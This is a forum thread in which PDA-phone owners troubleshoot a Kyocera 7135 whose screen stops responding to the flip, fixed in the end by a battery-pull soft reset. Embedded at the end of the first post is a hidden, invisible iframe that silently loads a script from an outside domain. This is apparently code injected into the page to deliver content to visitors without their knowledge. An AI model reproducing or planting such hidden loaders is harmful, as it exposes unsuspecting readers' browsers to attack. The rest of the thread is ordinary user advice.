+ Reply to Thread

PDA On/Off Problems

I've been seeing some wierd behavior with the 7135 on opening and closing it.

When I first got it, it would activate when it was flipped open, turning on the screen. Would also shut off when it was flipped closed.

Now it seems to not turn on when opened. And sometimes it doesn't even respond to the application buttons to turn on. I have to press the volume buttons on the side to get it to "wake up". And sometimes the flip is opened the screen comes on but not the blacklight. Is there a button to turn it on?

Also, if it's on and the flip is closed, the screen stays on, it doesn't turn off. Is there any on/off button like on regular palms?

Anyone seen anything like this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: PDA On/Off Problems

Originally posted by angus
    I've been seeing some wierd behavior with the 7135 on opening and closing it.

When I first got it, it would activate when it was flipped open, turning on the screen. Would also shut off when it was flipped closed.

Now it seems to not turn on when opened. And sometimes it doesn't even respond to the application buttons to turn on. I have to press the volume buttons on the side to get it to "wake up". And sometimes the flip is opened the screen comes on but not the blacklight. Is there a button to turn it on?

Also, if it's on and the flip is closed, the screen stays on, it doesn't turn off. Is there any on/off button like on regular palms?

Anyone seen anything like this?
    Sounds like a bad "flip sensor" switch. Someone else on the board had that happen back in January. Kyo replaced the phone.

Alan

Talk about amazing support

Following Alan's advice, I was writing to Kyo on their support web page, and one of the fields was for the ESN. Of course that's behind the battery, and I guess I had it out long enough to do a soft reset.

Sure enough, that fixed the problems, screen now activates and deactivates with the flip again.

That's *amn good tech support, the contact page fixed the problem!!!

angus, glad you're back in good shape.
    ~'kito
    pdaPhoneHome Moderator

Re: Talk about amazing support

Originally posted by angus
    Following Alan's advice, I was writing to Kyo on their support web page, and one of the fields was for the ESN. Of course that's behind the battery, and I guess I had it out long enough to do a soft reset.

Sure enough, that fixed the problems, screen now activates and deactivates with the flip again.

That's *amn good tech support, the contact page fixed the problem!!!
    :rofl ROFL
    iPhone therefore iAm.

I have used the Kyocera Tech support several times. They by far have one of the best support centers! They are very knowledgeable and they take the time to help you all of the way. They have no problems spending as long as they need. They are the best!

I just did the same thing to get rid of a reverse screen of death when I tried to use snapper mail to check email when the battery was 99% dead and the low battery warning locked it up.

I got over 75 minutes of voice and 120 minutes of PDA use over 15 hours today before I killed it at 12mn.

A Quick battery change did a soft reset and it was fixed.
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16